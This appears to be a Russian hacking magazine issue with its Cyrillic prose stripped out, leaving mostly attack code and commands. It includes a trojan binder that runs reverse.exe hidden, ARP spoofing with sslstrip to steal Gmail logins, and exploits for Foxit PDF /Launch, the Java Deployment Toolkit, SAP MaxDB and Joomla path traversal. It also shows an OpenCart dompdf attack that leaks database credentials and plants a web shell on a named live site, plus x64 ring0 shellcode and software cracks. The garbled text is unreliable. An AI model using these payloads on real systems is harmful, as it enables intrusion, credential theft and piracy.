. portable- .
, , , . ThinApp
( Thinstall) VMWare.
-, 0 -
, , Win7 64- ,

041

3.,
.
: ThinApp
, , ,
, . ,
exe .
7, 8 IE XP IE6
(. ).
. : , .
.
1. ThinApp;
2. ThinApp Setup Capture
;
3. , ;
4. ;
5. ;
6. - ThinApp;

:
EXE-

:
msfpayload, , msfencode (
Metasploit), - exe-.
: exe- ,
, , , :)...
. , ,
. .
, IExpress. , , .
:

7. , exe-
;
8. ;
9. , ;
10. ;
11. exe- ;
12. !

, ThinApp .
Package.ini ##Attributes.ini
build.bat
, Package.ini :
[Isolation]
DirectoryIsolationMode=Full


.

, .

5. (
);
6. ;
7. (ff1.
exe);
8. NoRestart;
9. .

1. (reverse.exe) ;
2. sbd.vbs :
Set wshshell = WScript.CreateObject(WScript.Shell)
wshshell.run calc.exe,1, False
wshshell.run reverse.exe,0,False

, Visual Basic,
exe-. , wshshell.run:
1. ;
2. , 0 , 1
( );
3.
.

iexpress ( iexpress)
:
1. ;
2. ;
3. ;
4. , (sbd.vbs,
reverse.exe, calc.exe);

042

IExpress

: ff1.
sed ff1.exe.
ff1.sed AppLaunched ,
vb-:
AppLaunched=cscript sbd.vbs

iexpress SED (

iexpress).
. sed-,
.

, ,
18 21 41.

: PCAP

:
, pcap-
( ), .
, ,
html. ,
, .
, Win NetworkMiner.
, pcap-
, . ,
, .
, Back Track 4,
foremost tcpxtract. ,
.
:
foremost -i dump.pcap

-i dump.pcap pcap- .

:
GMAIL ,

:
, Black
Hat DC 2009 sslstrip.
,
, , ,
, .
:
1. sslstrip;
2. arpspoof.

BackTrack, .
:
1)192.168.0.1 ;
2)192.168.0.101 ;
3)192.168.0.102 .

, :
arpspoof -i eth0 -t 192.168.0.101 192.168.0.1

-
ARP-, MAC- .
ARP- ,
, , MAC-. , , 192.168.0.1
- , ,
. ,
.
, , :

NetworkMiner
/etc/foremost.conf.

echo "1" > /proc/sys/net/ipv4/ip_forward

- , HTTP FTP-,
, . ,
.
,
HTTPS c SSL TLS. ?
HTTPS- - HTTP/
HTTPS -.
, sslstrip, ,
HTTP-, sslstrip
Gmail .
, -, HTTP-
.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

TCP-, 80 ,
8080.
sslstrip ( -l) 8080 ,
sslstrip.log ( -a):
sslstrip -a -l 8080

sslstrip.log.
,
, , HTTPS-
.. ,
sslstrip , Gmail,
.
0.2 ( BT4),
0.7. , 0.7. z

043


, Digital Security dookie@inbox.ru


. ,
. , ,
, , . ,
, , , GET,
( ), , , , .

JAVA. , .

Joomla. .

01


PDF

CVE
CVE-2010-1239

TARGETS
Foxit Reader 3.2.1.0401

BRIEF
(Didier Stevens)
,
PDF Acrobat Reader Foxit Reader.
.
PDF ,
. , . , Acrobat Reader
,
(,
,
).

EXPLOIT
, ?
/Launch.

044

Joomla. .

, PDF,
,
PostScript. , ;
/Action, Launch. ,
. .
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<

- .

PDF-.

/F (calc.exe)
/P (\nTo continue viewing the encrypted
content\nplease click the Dont show this
message again box\nand press OK!)
>>

F1

>>
endobj

02

JAVA DEPLOYMENT TOOLKIT

X CVE
CVE-2010-1423

8 ( ),
,
Action Launch. /F ,
/P ,
Acrobat Reader.
, /P,
:
/F (cmd.exe)
/P (/Q/C echo text>file)

,
Acrobat Reader.
PDF- .

SOLUTION
Foxit ,
. Adobe,
PDF- Trust Manager. , ,
...

TARGETS
Java SE 6 update 10 update 20

BRIEF
. Sun Oracle. ,
HTML- JAR-
DLL.
.
,
Linux ( ). . Java Deployment Toolkit,
Java-
Web.

EXPLOIT
-, (Tavis Ormandy)
. JAR-,

045

ROP .

.
FireFox Internet Explorer. :
/*http://lock.cmpxchg8b.com/calc.jar JAR*/
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
/*MIME , */
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptableplugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
/* ,
*/
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}

IE :
/*http://lock.cmpxchg8b.com/calc.jar JAR*/
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar
none";
/* , ID*/
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000ABCDEFFEDCBA";


/* */
o.launch(u);

, launch. javaws.exe .
J-jar , JAR. .

(Ruben Santamarta). , DLL,
JAR. J-jar ,
JXXaltjvm. javaws.exe, ,
, .
, SUN:
if (browser == 'MSIE')
{
document.write('<' +
'object classid="clsid:8AD9C840-044E-11D1-B3E900805F499D93" ' + 'width="0" height="0">' +'<' +
'PARAM name="launchjnlp" value="' +
jnlp + '"' +
'>' + '<' + 'PARAM name="docbase" value="' +
jnlpDocbase + '"' + '>' + '<' + '/' + 'object' +
'>');
}
else if (browser == 'Netscape Family')
{
document.write('<' +
'embed type="application/x-java-applet;jpiversion=' +
deployJava.firefoxJavaVersion + '" ' +
'width="0" height="0" ' +
'launchjnlp="' + jnlp + '"' +

.
. ,
Google.

egg-hunter . ?

'docbase="' + jnlpDocbase + '"' +


' />');

http://[SITE]/index.php?option=com_sebercart&view=../.
./../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_powermail&controlle
r=../../../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_news_portal&contro
ller=../../../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_awiki&controller
=../../../../../../../../../../../../../../../etc/
passwd%00
http://[SITE]/index.php?option=com_jukebox&controller=
../../../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_datafeeds&controlle
r=../../../../../../../../../../etc/passwd%00

docbase launchjnlp.

SOLUTION
Oracle, ,
, .
, ,
, , , ,
Oracle ,
, javaws.exe.

03

JOOMLA

TARGETS

com_news_portal version 1.5.x


com_awiki
com_sebercart version 1.0.0.12
com_powermail version 1.5.3
com_jukebox version 1.7
com_datafeeds version 880

, controller.
, ,
JRequest::getVar(). :
// Require specific controller if requested
if ($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

require_once, $controller.
JRequest::getVar() HTML-.

SOLUTION
,
,
"./".

04

STR_
TRANSLITERATE()

TARGETS
PHP 6.0 Dev

BRIEF
Web- ,
- Joomla
. exploit-db.com Web . - Joomla. -
AntiSecurity, DevilZ TM Valentin.
AntiSecurity
.
Joomla. ,
. ,
( , , ). ,
Joomla
. , Joomla ,
. OSSIM
PhpMyAdmin RoundCube Webmail.

BRIEF

EXPLOIT

EXPLOIT

, ,
. LFI-, -

PHP-,
-, .. 4


PHP 6.0.

, . .
Pr0T3cT10n. , ,
, , -
PHP 6.0 Dev. , PHP-
str_transliterate(),
GET/POST-. php.
ini , unicode .
, .
, ,
DEP ASLR. , ,
. ,
(Matteo Memelli) .

047

-, .

( , ).
base64.
, GET-
PHP-. DEP ASLR.
. ,
ASLR, , ,
,
. - ,
-
(ROP). .
, , RET.
, RET
( ) ,
, RET.
, -.
ASLR DEP,
-, . - .
WriteProcessMemory,
-, , .text
. , . -
ROP,
(.text ASLR). WriteProcessMemory.
- . ,
kernel32.dll, - ASLR.
, . . , ,
, : ,
WriteProcessMemory. , Apache
. ...
, ,

048
48

, ()
, . , , . ,
. ASLR , ,
-. , ,
, .
. , Windows XP ,
. XP ASLR
, :
http://[SITE]/pwnPhp6.php?off_s=34&pos_
s=124&rnd=0&off_e=15&pos_e=128

WriteProcessMemory.
DVD.

SOLUTION
:
1. ;
2. PHP 6.0 Dev;
3. ;
4. Unicode.

05

SAP MAXDB

CVE
CVE-2010-1185

TARGETS
SAP MaxDB 7.7.06.09

, SYSTEM.

packet = (

BRIEF
SAP MaxDB
, ,
, - .
(AbdulAziz Harir) Insight Technologies.
TippingPoint Zero Day Initiative. , .
, S2 Crew, ,
. 4444
.

EXPLOIT
, TCP- , 7210 .
. ,
, , .
, ,
. , ,
, .
:

"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00"
"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
"\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x07\x49" + "A"*5000 + "T00WT00W" + sc
+ "\x41" * 2500 + egghunter + "\x90"*2500)

egg-hunter
- ( egghunter),
- ( sc).
T00WT00W. egg-hunter .
, ,
.
.
. , ,

. egg-hunter -, , . ,
egg-hunter -,
-. , .

SOLUTION
ret = "\x08\xf1\xa0\x00" # HC

SAP MaxDB . z

049


Anonim

,
.
casualis, . , ,
, , , -
. .
, . !

, .
, , .

(, , ). ,
,
. ,

050

.

,
. 60 , ,
, .
, ,
.
,
, ,
.


, nsgame.dat

,
,
. , .
,
.
,
: , ;
,
. Total Commander

. ,
? , ,
. Delphi 7.
,
. ...

, , ,
, ... !

. ,
, .
,
. .
*.tmp.
, , , .
, . , .
exe
(, , ).

,
. , ,

. .
.

NevoSoft'a
, , *.tmp. ,
, . , *.tmp
nsgame.dat,
. , nsgame.dat *.tmp
.
, ,
.

,
. ,
, . Total Commander .
, :
2 .
, , ?
.
( ) XOR-.
,
XOR. ,
.
? .
, .
Crypted = uncrypted XOR key;
Key = crypted XOR uncrypted

,
$43000

.
XOR .
, ,
. XOR
256 ,
.
var
i, o: TFileStream;
bi, bo:byte;
x, ii, cc:integer;
begin
if open.Execute then
begin
SetCurrentDir('C:\ NevoSoft\Peacecraft\
game');
//
if not(fileexists('nsgame.dat')) then exit;
i:=TFileStream.Create('nsgame.dat', fmOpenRead);
o:=TFileStream.Create(open.FileName, fmOpenRead);
x:=0; ii:=0; cc:=0;
// 256
for x:=0 to 255 do
begin
i.read(bi,1);
o.read(bo,1);


key.Caption:=format('%s %x', [key.Caption, (bi


xor bo)]);
inc(cc);
if cc mod 8 =0 then key.Caption:=key.
Caption+#13#10;
end;
i.Free;
o.Free;
end;

, , , -
: 4 . , ,

. ?!
.
PE- 2
XOR. :
XOR 2 , 4
? 3- 4- $00.
const
ckey = #77#90; // PE-
begin
i:=TFileStream.Create(FileName, fmOpenRead);
for x:=1 to 2 do
begin
i.Read(tmp,1);
tmp:=ord(ckey[x]) xor tmp;
key:=key+chr(tmp);
end;
key:=key+#0#0;

-,
.

,
,

, , ...

. , . ...


XOR
nsgame.dat

procedure wrap(filename:string);
var
  i, o: TFileStream;
  bi, bo, tmp: byte;
  x, ii: integer;
  key: string[4];
  buffer: TMemoryStream;
const
  ckey = #77#90; // 'MZ', the first two bytes of a PE file
begin
  if not(fileexists(filename)) then exit; // =)
  i:=TFileStream.Create(filename, fmOpenRead); // input file
  o:=TFileStream.Create(ChangeFileExt(filename, '.exe'), fmCreate); // output file
  buffer:=TMemoryStream.Create;
  key:=''; // a local short string is not initialised automatically
  for x:=1 to 2 do // derive the first two key bytes from the file header
  begin
    i.Read(tmp,1);
    tmp:=ord(ckey[x]) xor tmp;
    key:=key+chr(tmp);
  end;
  key:=key+#0#0;
  i.Seek(0,soFromBeginning);
  x:=0; ii:=0;
  while i.Position<i.Size do // XOR the whole file with the 4-byte key
  begin
    inc(ii);
    i.Read(bi, 1);
    bo:=bi xor ord(key[ii]);
    buffer.Write(bo,1);
    inc(x);
    if ii=4 then ii:=0;
  end;
  o.Write(Buffer.Memory^, Buffer.size);
  i.Free;
  o.Free;
  buffer.Free;
  showmessage('Wrapping done');
end;

...
- . , ,
?! !
. ,
.
Total Commander , , .
.
, Total
Commander , , $43000,
.
, ,
, $43000 .
, $43000 .
while i.Position<i.Size do
begin
inc(ii);
i.Read(bi, 1);
if x<$43000 then
begin
bo:=bi xor ord(key[ii]);
buffer.Write(bo,1);
end
else
buffer.Write(bi,1);
inc(x);
if ii=4 then ii:=0;
end;

(,
, , ,
). ;
. , NevoSoft' , .
, ,
.


IT-,

. , ,
, , ;
,
. . 272-274
! :) z



Ams

OpenCart
- OPENCART

, , . -
, , , .
,
, PHP-. , ? ,
- OpenCart, ,
.

,
.

- OpenCart
1.4.6. -
.
,
,
:
eval("?" .">$str");

- , .

system/helper/dompdf/include/dompdf.


cls.php, 276 .
,
load_html(), $str,
. ,
,
, DOMPDF.
, dompdf,
;
. ,
dompdf.php! , ,
, .
,
$_GET['input_file']. ,
, ,

.
. ,
,
:
printf("File: %s, line: %d<br/>", __FILE__, __LINE__);

, : input_
file, load_html_file()
DOMPDF. , ,
file_get_contents(),
load_html().

OpenCart
- .
,
,
.
, . , , .
. :
http://localhost/h/opencart_v1.4.6/upload/
system/helper/dompdf/dompdf.php?input_
file=../../../../../../etc/passwd

DOMPDF

, /etc/passwd PDF-.
, ,
.

, , - .
eval()
PHP-.
, ,
.

HTTP://WWW
links
opencart.com

OpenCart.
us3.php.net/manual/en/features.fileupload.put-method.
php PHP
PUT.
php.net/manual/en/
wrappers.data.php
PHP
.
archives.neohapsis.
com/archives/fulldisclosure/2009-07/0417.
html

DOMPDF.
digitaljunkies.ca/
dompdf/index.php
DOMPDF.
exploit-db.com/
papers/260
RFI/LFI CWH
Underground.


dompdf.php

. PHP 5.2.0 data:, . data
127 ,
, .
, Perl. ,
Perl ,
.
, :

$cmd = encode_base64($cmd
. '| sed -e :a -e \'$!N;s/\
n/<br\/>/;ta\'');

$cmd , , ls -la.
,
. sed , <br/>,
PDF HTML.
:

PDF-

ls -la | sed -e :a -e '$!N;s/\n/<br\/>/;ta'


sed, .
base64 .
my $tobase64php = "<?php \@
system(base64_decode('$cmd'));";
my $payload = 'data:;base64,' .
encode_base64($tobase64php);

,
PHP.

, PDF. : ,
?

. OpenCart
, . dompdf exploit ( -
) - .
Benj Carson YGN Ethical Hacker Group
,
,
PDF ( ).
, ,
OpenCart .

, ..?

, ,
.
, ,



-. , ?
, ! , ,

, . ,
. ,
. (
) .
, .
,
. , :
demo.opencart.com/system/helper/dompdf/
dompdf_main.php

, .
, .
. :
perl dompdf.pl -u=http://demo.opencart.com/
-c='ls -la'

PDF'. ,
: PDF-.
,
. ,
PHP:

, PHP
.

DVD

,
. ? :
http://demo.opencart.com/system/
helper/dompdf/dompdf.php?input_
file=../../../../../../../etc/passwd

PDF- . , .
.
OpenCart config.php. ,
, PHP-,
- , . , URL
:

dvd

,

, -
,


OpenCart (
)55

http://demo.opencart.com/system/helper/
dompdf/dompdf.php?input_file=php://

URL file-access is disabled in the server


configuration in...

--. ,
PHP allow_url_fopen=off.
data , , , RFI
. , ,
.
,
, ,
. allow_url_fopen=off,
. ,

filter/convert.base64-encode/
resource=../../../config.php

,
PHP 5.0.0. ,
, base64.
,
. , ,

PDF. , :
<?php
...
// DB
define('DB_DRIVER', 'mysql');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'opencart_user');
define('DB_PASSWORD', '|l$Ik|S;15Yf');
define('DB_DATABASE', 'opencart_demo');
define('DB_PREFIX', '');
?>

MySQL.

3306. :
nmap 85.13.246.138 -p 3306

nmap , .
:

mysql -h 85.13.246.138 -u
opencart_user -p

. ,
.
,
:
,
, .
. .
.
data
, ,
?
.
PHP-,
. ,

.
.
.
PHP,
. .
: , PDF
PHP- .
, .
PHP-
. ,
- apache, /proc
. .

, .
, . ,
.

PHP
. ,
, php://input.
POST ,
- PHP.
, :
,
POST-. :
http://.../dompdf.php?input_
file=php://input

Perl-,
.
. , POST, URL;
, .
, :
var=%3C%3Fphp%20echo%28999%29%3B

,
. ,
.
php://input
PUT.
, POST, . ,

PHP PUT


:)
POST PUT,
- , PHP-. ?
, ,
.
PUT php:/input,

, .
:
my $tmp_shell = <<'B64';
<?php

PHP-. PUT. ,
.
.
, ,
, allow_
url_fopen=off.
, .

.
:

if(@move_uploaded_file($_FILES['fi']
['tmp_name'],$_FILES['fi']['name']))
{
echo(9);

www-data@sd:/var/www/lib$ ./e.pl
-u=http://demo.opencart.com/ -s=./
logs.php

@unlink(__FILE__);
}
B64
my $shell64 = encode_base64(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.opencart.com exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$tmp_shell);
my $tophp = sprintf(
"<?php eval(base64decode('%s'));",
encode_base64(
"file_put_contents('i.php',
base64_decode('$shell64'));")
);
# Stage 1, exploiting DOMPDF
vulnerability.

[~] Exploiting http://demo.


opencart.com/
[+] Ok, uploading shell...
[+] Ok, response[9], checking for
shell.
[+] Ok, shell: http://demo.
opencart.com/system/helper/dompdf/
newi.php

my $req = PUT "$url/dompdf.


php?input_file=php://input", Content
=> $tophp;

$tmp_shell
-.
(
) . -
i.php

, ,
. ,
,
PHP,
PHP-, .

, . ,

,
, ,
.
,
.
, (1.4.6) .
,
.

?
,
. , ,
,

. ,
: , .
, , ,
.
. ,
,
,
. ,
. .
Google. ,
, ,
. ,
, ,
.
, ,
. z



r0064 r0064@mail.ru

-
RING0-SHELLCODE
WINDOWS X64

, 64- Windows
. , ,
. , 64-
- ,
.
, . !

.
x64 - ring3 (inj3ct0r.com/exploits/9740).
.
, ,
- :
/ .

( - ring0)
Macro Assembler x64 (ml64). WDK.
WDK :
microsoft.com/whdc/DevTools/WDK/WDKpkg.mspx.

FASM (install_drv.
exe, start_drv.exe .). ,
( ).
: flatassembler.net/examples/win64_drivers.zip.
Microsoft Debugging
Tools (64- ) + livekd ( ).
Microsoft: microsoft.com/whdc/devtools/debugging/
install64bit.mspx technet.microsoft.com/ru-ru/sysinternals/
bb897415.aspx.
, DbgView.
( ) 64- ,


, , livekd (technet.microsoft.com/en-us/sysinternals/
bb896647.aspx).
IDA x64.
, ,
PE ,
64- .
64- :).

, . ,
.
1. (aka ntoskrnl);
2. ntoskrnl;
3. ;
4. Profit!
, ...

.
:
Processor Control Region ( PCR);
sidt;
msr ( - ).
,

DbgView
x64 -,
inj3ct0r.com
DVD

ml64
. ,
; . , !

20+ , .
, ,
idt. KPCR.IdtBase. PCR ,
, livekd.

dvd

DVD.

, ,
- , ntoskrnl.
, , int 3 idt.
, . ,
. x64 idt Patch Guard, .

livekd !idt, .

0: kd> !idt

Dumping IDT:

00: fffff8000102c400 nt!KiDivideErrorFault
01: fffff8000102c4c0 nt!KiDebugTrapOrFault
02: fffff8000102c600 nt!KiNmiInterrupt
Stack = 0xFFFFF8000011D000
03: fffff8000102c940 nt!KiBreakpointTrap
04: fffff8000102ca00 nt!KiOverflowTrap
05: fffff8000102cac0 nt!KiBoundFault
06: fffff8000102cb80 nt!KiInvalidOpcodeFault
07: fffff8000102cd40 nt!KiNpxNotAvailableFault
08: fffff8000102ce00 nt!KiDoubleFaultAbort
09: fffff8000102cec0 nt!KiNpxSegmentOverrunAbort
0a: fffff8000102cf80 nt!KiInvalidTssFault
0b: fffff8000102d040 nt!KiSegmentNotPresentFault
Stack = 0xFFFFF8000011B000
0c: fffff8000102d140 nt!KiStackFault
0d: fffff8000102d240 nt!KiGeneralProtectionFault
0e: fffff8000102d340 nt!KiPageFault
10: fffff8000102d680 nt!KiFloatingErrorFault
11: fffff8000102d7c0 nt!KiAlignmentFault
12: fffff8000102d880 nt!KiMcheckAbort
Stack = 0xFFFFF8000011F000
13: fffff8000102dbc0 nt!KiXmmException
1f: fffff800010279e0 nt!KiApcInterrupt
2c: fffff8000102dd40 nt!KiRaiseAssertion
2d: fffff8000102de00 nt!KiDebugServiceTrap
2f: fffff80001067c70 nt!KiDpcInterrupt

0: kd> dt _KPCR
nt!_KPCR
+0x000 NtTib : _NT_TIB
+0x000 GdtBase : Ptr64 _KGDTENTRY64
+0x008 TssBase : Ptr64 _KTSS64
+0x010 PerfGlobalGroupMask : Ptr64 Void
+0x018 Self : Ptr64 _KPCR
+0x020 CurrentPrcb : Ptr64 _KPRCB
+0x028 LockArray : Ptr64 _KSPIN_LOCK_QUEUE
+0x030 Used_Self : Ptr64 Void
+0x038 IdtBase : Ptr64 _KIDTENTRY64
+0x040 Unused : [2] Uint8B
+0x050 Irql : UChar
+0x051 SecondLevelCacheAssociativity : UChar
+0x052 ObsoleteNumber : UChar
+0x053 Fill0 : UChar
+0x054 Unused0 : [3] Uint4B
+0x060 MajorVersion : Uint2B
+0x062 MinorVersion : Uint2B
+0x064 StallScaleFactor : Uint4B
+0x068 Unused1 : [3] Ptr64 Void
+0x080 KernelReserved : [15] Uint4B
+0x0bc SecondLevelCacheSize : Uint4B
+0x0c0 HalReserved : [16] Uint4B
+0x100 Unused2 : Uint4B
+0x108 KdVersionBlock : Ptr64 Void
+0x110 Unused3 : Ptr64 Void
+0x118 PcrAlign1 : [24] Uint4B
+0x180 Prcb : _KPRCB

,
64 , ( 32- ) . ,
IdtBase
_PCR.


, , x64 PCR - (
livekd). KPCR?
hal.dll HalInitializeProcessor.
.text:000000008001F240 public HalInitializeProcessor
.text:000000008001F240 HalInitializeProcessor proc near ; DATA XREF: .pdata:000000008004C804 o
.text:000000008001F240
.text:000000008001F240 var_28 = byte ptr -28h
.text:000000008001F240 var_20 = byte ptr -20h
.text:000000008001F240 var_18 = qword ptr -18h
.text:000000008001F240 arg_0 = byte ptr
.text:000000008001F240
.text:000000008001F240 push rbx
.text:000000008001F242 sub rsp, 40h
.text:000000008001F246 mov r8, gs:18h
.text:000000008001F24F mov r10d, ecx
.text:000000008001F252 mov r9d, 1
.text:000000008001F258 mov rax, [r8+20h]
.text:000000008001F25C mov ecx, ecx
.text:000000008001F25E mov [rax+4], r10b
.text:000000008001F262 shl r9, cl
.text:000000008001F265 lea rax, HalpProcessorPCR
.text:000000008001F26C or cs:HalpActiveProcessors, r9
.text:000000008001F273 cmp cs:HalpStaticIntAffinity, 0
.text:000000008001F27A mov dword ptr [r8+64h], 64h
.text:000000008001F282 mov [rax+r10*8], r8

, PCR
gs:[18h]. 32- fs,
gs :).
, idt? int 3 ( , ),
, . , , x64 . ?
( )
(AMD, Intel), livekd.
! dt _KIDTENTRY64, .
0: kd> dt _KIDTENTRY64
nt!_KIDTENTRY64
+0x000 OffsetLow : Uint2B
+0x002 Selector : Uint2B
+0x004 IstIndex : Pos 0, 3 Bits
+0x004 Reserved0 : Pos 3, 5 Bits
+0x004 Type : Pos 8, 5 Bits
+0x004 Dpl : Pos 13, 2 Bits
+0x004 Present : Pos 15, 1 Bit
+0x006 OffsetMiddle : Uint2B
+0x008 OffsetHigh : Uint4B
+0x00c Reserved1 : Uint4B
+0x000 Alignment : Uint8B
0: kd>

, ( Offset). ,
, 64-.
, , , . , .
livekd
livekd -w

; rcx = _KPCR (gs:[18h] is KPCR.Self)
mov rcx, gs:[18h]
; +0x038 IdtBase : Ptr64 _KIDTENTRY64
mov rcx,qword ptr[rcx+38h]
; move to the int 3 entry
; each entry is 16 bytes, numbering starts at 0
; INT_X = 3
add rcx,16*INT_X
; combine OffsetLow, OffsetMiddle and OffsetHigh of KIDTENTRY64
mov r11,qword ptr [rcx]
and r11,0FFFFh
mov rcx, qword ptr [rcx+4]
; rcx = address of the int 3 handler (Offset)
mov cx,r11w
and cx,0F000h ; clear the low 12 bits
search_loo:
; look for the ntoskrnl headers
cmp word ptr [rcx],'ZM'
jnz nxt
sub rax,rax
; eax -> PE offset
mov eax,dword ptr [rcx+3Ch]
; check the PE signature
cmp word ptr [rcx+rax],'EP'
jz founded
nxt:
; ...
sub rcx,1000h ; step back one page
jmp search_loo
founded:
...

idt. ,
,
32- Windows.
idtr.
( 2 , ),
8 .
idtr x64 :
typedef struct _IDTR
{
USHORT usLimit;
ULONGLONG uBase;
}IDTR;

idt, sidt , . 12 , 1000h,


MZ PE.



KiSystemCall64 ( 64- ) msr
lstar ( 0xC0000082). (, ,
) syscall.
...
sub rcx,rcx
mov ecx,0C0000082h ; msr ecx
rdmsr ; - lstar
...

edx:eax
KiSystemCall64. ,
lstar. , syscall long mode ( ,
64- ) 2 msr : cstar
lstart compatibility 64-bit mode .
? msr cstar (0xC0000083) ,
ntoskrnl! KiSystemCall32.
.

WINDOWS X64

.
PE32+, .
, .
- win32, , ,
IMAGE_NT_HEADERS 78h. win64 88h.
PE32+ PE32.
_IMAGE_NT_HEADERS64:
typedef struct _IMAGE_NT_HEADERS64 {
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

,
- . IMAGE_EXPORT_
DIRECTORY ( IMAGE_DOS_HEADER) ,
.
PE32+:
...
shellcode_data:
db "ZwCreateFile",0
;...
; rcx = image base, rax = PE header offset
; export directory entry (offset 88h in PE32+)
lea r11,[rcx+rax+88h]
sub r12,r12
; export directory rva
mov r12d,dword ptr [r11]
; IMAGE_EXPORT_DIRECTORY
add r12,rcx
sub r8,r8
; NumberOfNames
mov r8d,dword ptr [r12+18h]
sub r9,r9
; AddressOfNames
mov r9d,dword ptr [r12+20h]
; function names virtual address
add r9,rcx
dec r8
; func_name
mov rdi,shellcode_data
next_function:
sub rsi,rsi
mov esi,dword ptr [r9+r8*4]
add rsi,rcx
; save the registers that cmpsb changes
cld
push rdi
; rcx is the counter for cmpsb
push rcx
; number of bytes compared by cmpsb
mov rcx,12
; compare the names
repe cmpsb
jz founded_f
pop rcx ; restore the registers changed by cmpsb
pop rdi
; next name
dec r8
jnz next_function
jmp not_found
founded_f:
pop rcx
pop rdi
sub rbx,rbx
; AddressOfNameOrdinals RVA
mov ebx,dword ptr [r12+24h]
;NameOrdinals VA
add rbx,rcx
; index in address table into r8
mov r8w, word ptr [rbx+r8*2] ; r8 = ordinal
and r8d,0FFFFh
sub rbx,rbx
mov ebx,dword ptr [r12+1Ch]
add rbx,rcx
sub r12,r12
mov r12d, [rbx+r8*4] ; r12 = function RVA
; rcx = address of ZwCreateFile
add rcx,r12
not_found:
...

, . -,
, .
-, .
ml64,
DbgView.
livekd.
:
u _

- 64- . . ,
, 64-
-. ,
rip-relative addressing . ,

:). , ,
, ! z



Maksim.Burnin@gmail.com; 2FED

BUMPTOP -

, ,
. BumpTop
,
. , , , 3D.

- BumpTop(), .
, , . ,
BumpTop , - ,
.

, . C
thepiratebay.org, BumpTop
1 - 2008 . ,
BumpTop. ,
. , , ,
bumptop.exe IDA
pro. IDA ,
. .
, , -


. Strings (Shift+F12)
Please enter your invite code:,
. .rdata:00647D1C,
. jump to xref operand(x), , .
. , , , , (F2) (F9).
, (F8) 0041B7A7. ...
! .
, , .
,
.text:0041B350, , (jump to xref
operand). , ,
:
.text:004862B4 cmp byte ptr [eax+8Bh], 0 ; 0
.text:004862BB jnz short loc_4862C2 ;
.text:004862BD call sub_41B350 ;

Bumptop beta 12

, ,
. JNZ (, ), ,
- , ZF (
, JZ JNZ) 1
0. , General Registers Run(f9). Bumptop,
,
, !
,
. bumptop.exe
HIEW, <enter> . F5, (.004862BB)
<enter>.
F3 F2
JNE JE (JNE/JE JNZ/JZ). , ,
(F9) !
? BumpTop
. , , . Yes.


BUMPTOP RELOAD...

3D Desktop'a , , , 5-10 beta 12 BumpTop'a. ,


, Yes.
3D-
,
: Authorization failed! Please enter your invite
code. IDA BumpTop.exe,
...

0068A2CC Authorization failed! ,


0041FF23. <PgUp> , .
<X> <Enter>
; 0042258C. . , ,
ZF , .
, ...

, . 10 .
,
, . , 0041EE54. :
.text:0041EE2D test al, al
;
.text:0041EE2F jnz loc_41EED2
;
.text:0041EE35 push ecx
.text:0041EE36 mov ecx, esp
.text:0041EE38 mov [esp+0ECh+var_C0], esp
.text:0041EE3C push offset aAuthorizationf
; AuthorizationFailed
.text:0041EE41 call ds:??0QString@@QAE@PBD@Z
.text:0041EE47 lea eax, [esp+0E8h+var_B0]
.text:0041EE4B push eax
.text:0041EE4C mov [esp+0ECh+var_4], 2Fh
.text:0041EE54 call sub_422550
;

,
JNZ 0041EE2F, ,
, ZF. , ! HIEW,
, , JNZ JZ,
0041EE2F. BumpTop ,
12 , BumpTop Beta 19!

.
3D Desktop' .

,
,
beta.
BumpTop .
. z



icq 884888, http://snipper.ru

$2.700.000.000 , ?
.

,
.


,
.
, sam-worthington.
net. 8 ,
30
,
,
:).

, ,
. samworthington.net
-,
:).
,
.
WordPress
, , ,
2.9.2 ( html-


-
Generator). , -
.

Coppermine Photo Gallery (samworthington.net/gallery/). ,
,
html- <!--Coppermine Photo Gallery 1.4.26
(stable)-->.
, ,
Powered free by PHPmotion,
videos.
sam-worthington.net. www.phpmotion.com,
,
YouTube,
.
PHPmotion, :
, -
. , -
,

images
logo.gif logo.png, ,
2.0.
PHPmotion
3.0, ( ).
,
, VERSION.txt PHPmotion Version 2 STABLE - 28
APRIL 2008. ,
, ,

:).

PHPMOTION


./audio_selector.php:
<?php
...
$selector_audio_id = mysql_real_escape_string($_GET['vid']);
...

blind sql-injection
PHPmotion

/etc/passwd e-mail

HTTP://WWW
links
downloads.phpmotion.com/V2/PHPMOTION_PHP5.zip
PHPmotion 2.0
downloads.phpmotion.com/V3.0/php5/
phpmotion.zip
PHPmotion 3.0
snipper.ru/view/17/
phpmotion-2xratephp-blind-sqlinjection-exploit/
PHPmotion 2.x
rate.php blind sql
injection exploit
www.phpshield.com
phpShield

PHPmotion
WARNING
$selector_sql = "SELECT * FROM audios WHERE indexer = $selector_audio_id AND approved ='yes'";
...
?>

, , , - !
union select $_GET['vid']
IDS, ,
, ,
./classes/config.php
phpShield.

, .
rate.php:
<?php
...
$rate_video_id = mysql_real_escape_string($_GET['rate_id']);
$rate_video_rating = mysql_real_escape_string($_GET['rate']);
...
